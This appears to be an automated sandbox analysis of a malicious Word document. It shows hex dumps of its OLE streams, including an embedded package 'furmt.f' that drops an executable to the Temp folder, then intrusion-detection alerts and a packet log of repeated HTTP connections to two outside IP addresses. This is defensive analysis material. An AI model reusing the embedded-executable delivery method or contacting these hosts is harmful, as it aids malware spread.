                                          Data Raw:01 0b b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 b9 43 7b 62 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                          Stream Path: ObjectPool/_1681005150/\x1CompObj, File Type: data, Stream Size: 76
                                          General
                                          Stream Path:ObjectPool/_1681005150/\x1CompObj
                                          File Type:data
                                          Stream Size:76
                                          Entropy:3.09344952647
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: ObjectPool/_1681005150/\x1Ole10Native, File Type: data, Stream Size: 123180
                                          General
                                          Stream Path:ObjectPool/_1681005150/\x1Ole10Native
                                          File Type:data
                                          Stream Size:123180
                                          Entropy:6.81910907593
                                          Base64 Encoded:True
                                          Data ASCII:( . . . . . f u r m t . f . C : \\ U s e r s \\ M y P c \\ D e s k t o p \\ B u i l d e r _ v 6 6 7 \\ f u r m t . f . . . . . ) . . . C : \\ U s e r s \\ M y P c \\ A p p D a t a \\ L o c a l \\ T e m p \\ f u r m t . f . . . . . M Z P . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! . . T h i s p r o g r a m m u s t b e r u n u n d e r W i n 3 2 . . $ 7 . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:28 e1 01 00 02 00 66 75 72 6d 74 2e 66 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 44 65 73 6b 74 6f 70 5c 42 75 69 6c 64 65 72 5f 76 36 36 37 5c 66 75 72 6d 74 2e 66 00 00 00 03 00 29 00 00 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 66 75 72 6d 74 2e 66 00 00 e0 01 00 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00
                                          Stream Path: ObjectPool/_1681005150/\x3EPRINT, File Type: Windows Enhanced Metafile (EMF) image data version 0x10000, Stream Size: 4976
                                          General
                                          Stream Path:ObjectPool/_1681005150/\x3EPRINT
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Stream Size:4976
                                          Entropy:3.35834517606
                                          Base64 Encoded:False
                                          Data ASCII:. . . . l . . . . . . . . . . . ( . . . / . . . . . . . . . . . . . . . . . . . E M F . . . . p . . . . . . . . . . . . . . . . . . . . . . . V . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . R . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . e . g . o . e . . U . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . .
                                          Data Raw:01 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 28 00 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 da 04 00 00 91 05 00 00 20 45 4d 46 00 00 01 00 70 13 00 00 0d 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 05 00 00 97 02 00 00 69 01 00 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 83 05 00 3a ad 02 00 0a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00
                                          Stream Path: ObjectPool/_1681005150/\x3ObjInfo, File Type: data, Stream Size: 6
                                          General
                                          Stream Path:ObjectPool/_1681005150/\x3ObjInfo
                                          File Type:data
                                          Stream Size:6
                                          Entropy:1.25162916739
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . .
                                          Data Raw:00 00 03 00 0d 00
                                          Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                          General
                                          Stream Path:WordDocument
                                          File Type:data
                                          Stream Size:4096
                                          Entropy:1.81283499392
                                          Base64 Encoded:False
                                          Data ASCII:. . . . Y . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . b j b j 8 . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . Z p . e Z p . e ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:ec a5 c1 00 59 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 21 08 00 00 0e 00 62 6a 62 6a 38 1a 38 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 5a 70 d2 65 5a 70 d2 65 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          04/29/21-08:16:14.954530ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:21.040252ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:22.054484ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:24.066175ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:28.406814ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:29.420586ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:31.433770ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:36.708850ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:37.734041ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:39.746092ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:42.494949ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:44.488661ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:45.523610ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:51.344206ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:52.352483ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:16:54.364049ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:00.207171ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:02.152940ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:04.165054ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:08.109281ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:09.123135ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:11.160237ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:15.460561ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:16.474311ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:18.487123ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:23.323301ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:24.339192ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:26.349890ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:29.713418ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:31.703850ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:32.832442ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:38.563358ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:39.577040ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:41.589862ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:44.952120ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:46.943725ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:48.959819ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:53.806066ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:54.820655ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:17:56.831806ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:00.213932ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:02.168010ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:04.180217ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:09.004102ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:10.018516ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:12.031634ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:16.364893ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:17.380918ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:19.392773ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:24.215378ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:25.229895ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:27.242414ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:31.577242ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:34.603407ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:38.471209ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:40.453986ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:42.466293ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:45.806016ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:46.823182ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:47.858175ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:53.677397ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:54.685525ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:18:56.697011ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:01.016484ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:02.031834ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:04.045535ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:08.881082ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:09.895190ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:11.906926ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:16.245007ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:19.270733ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:24.075730ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:25.088860ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:27.101956ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:31.423716ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:32.438117ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:34.449703ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:38.397760ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:39.411674ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:41.424418ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:45.745915ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:46.759456ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:48.772351ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:53.671226ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:54.685568ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:19:56.697750ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:01.035205ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:02.049460ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:04.062210ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:08.882947ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:09.897748ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:11.909371ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:16.247032ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:17.260304ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:19.273536ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:24.063188ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:25.076313ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:27.088639ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:31.427760ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:32.441075ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:34.453242ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:39.293161ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:40.307079ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:42.320337ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:46.638431ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:47.652723ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:49.664383ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:54.485485ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:20:57.512278ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:01.833712ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:02.847662ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:04.861028ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:09.681042ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:12.707588ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:17.048365ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:18.061836ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:20.074355ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:24.907929ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:27.934951ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:30.334560ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:32.322264ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                          04/29/21-08:21:34.334559ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 29, 2021 08:16:08.487066984 CEST4916580192.168.2.2250.16.249.42
                                          Apr 29, 2021 08:16:08.624238014 CEST804916550.16.249.42192.168.2.22
                                          Apr 29, 2021 08:16:08.624483109 CEST4916580192.168.2.2250.16.249.42
                                          Apr 29, 2021 08:16:08.625492096 CEST4916580192.168.2.2250.16.249.42
                                          Apr 29, 2021 08:16:08.762581110 CEST804916550.16.249.42192.168.2.22
                                          Apr 29, 2021 08:16:08.774343014 CEST804916550.16.249.42192.168.2.22
                                          Apr 29, 2021 08:16:08.774482012 CEST4916580192.168.2.2250.16.249.42
                                          Apr 29, 2021 08:16:14.729670048 CEST4916680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:16:14.824706078 CEST804916695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:16:14.824824095 CEST4916680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:16:14.826397896 CEST4916680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:16:14.921472073 CEST804916695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:16:14.968997002 CEST804916695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:16:14.969192028 CEST4916680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:16:44.894009113 CEST4916680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:16:44.895188093 CEST4916780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:16:44.984783888 CEST804916795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:16:44.984930992 CEST4916780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:16:44.986207008 CEST4916780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:16:44.988949060 CEST804916695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:16:44.989034891 CEST4916680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:16:45.076121092 CEST804916795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:16:45.113055944 CEST804916795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:16:45.113296986 CEST4916780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:01.676654100 CEST4916780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:01.679394007 CEST4916880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:01.767601967 CEST804916795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:01.767760038 CEST4916780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:01.768989086 CEST804916895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:01.769747019 CEST4916880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:01.770440102 CEST4916880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:01.860275030 CEST804916895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:01.900310040 CEST804916895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:01.900512934 CEST4916880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:08.709733963 CEST804916550.16.249.42192.168.2.22
                                          Apr 29, 2021 08:17:08.710058928 CEST4916580192.168.2.2250.16.249.42
                                          Apr 29, 2021 08:17:16.906234980 CEST4916880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:16.907419920 CEST4916980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:16.995609999 CEST804916895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:16.995795012 CEST4916880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:16.998455048 CEST804916995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:16.998591900 CEST4916980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:16.999990940 CEST4916980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:17.090508938 CEST804916995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:17.125000000 CEST804916995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:17.125083923 CEST4916980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:32.105828047 CEST4916980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:32.106182098 CEST4917080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:32.196365118 CEST804917095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:32.196400881 CEST804916995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:32.196484089 CEST4917080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:32.196541071 CEST4916980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:32.197963953 CEST4917080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:32.287601948 CEST804917095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:32.327707052 CEST804917095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:32.327904940 CEST4917080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:47.353899002 CEST4917080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:47.354862928 CEST4917180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:47.443473101 CEST804917095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:47.443629980 CEST4917080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:47.445350885 CEST804917195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:47.445476055 CEST4917180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:47.446813107 CEST4917180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:47.537522078 CEST804917195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:47.575416088 CEST804917195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:47.575642109 CEST4917180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:58.289191008 CEST4917180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:58.289428949 CEST4916580192.168.2.2250.16.249.42
                                          Apr 29, 2021 08:17:58.388020039 CEST804917195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:17:58.388168097 CEST4917180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:17:58.426613092 CEST804916550.16.249.42192.168.2.22
                                          Apr 29, 2021 08:18:02.571827888 CEST4917280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:02.660007954 CEST804917295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:02.660150051 CEST4917280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:02.661334038 CEST4917280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:02.749788046 CEST804917295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:02.786098957 CEST804917295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:02.786405087 CEST4917280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:17.788163900 CEST4917280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:17.789525032 CEST4917380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:17.876805067 CEST804917295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:17.876890898 CEST4917280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:17.877446890 CEST804917395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:17.877564907 CEST4917380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:17.878882885 CEST4917380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:17.967547894 CEST804917395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:18.001451015 CEST804917395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:18.001553059 CEST4917380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:33.000392914 CEST4917380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:33.001569986 CEST4917480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:33.088768959 CEST804917395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:33.088916063 CEST4917380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:33.089931965 CEST804917495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:33.090015888 CEST4917480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:33.090591908 CEST4917480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:33.179020882 CEST804917495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:33.215881109 CEST804917495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:33.216087103 CEST4917480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:47.227978945 CEST4917480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:47.229130030 CEST4917580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:47.317003965 CEST804917495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:47.317166090 CEST4917480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:47.317596912 CEST804917595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:47.317687988 CEST4917580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:47.319185019 CEST4917580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:18:47.407165051 CEST804917595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:47.441540003 CEST804917595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:18:47.441772938 CEST4917580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:19:02.439764977 CEST4917580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:19:02.444542885 CEST4917680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:19:02.529743910 CEST804917595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:19:02.529843092 CEST4917580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:19:02.540210009 CEST804917695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:19:02.540343046 CEST4917680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:19:02.541588068 CEST4917680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:19:02.637648106 CEST804917695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:19:02.672355890 CEST804917695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:19:02.672569990 CEST4917680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:19:17.666941881 CEST4917680192.168.2.2295.47.161.162
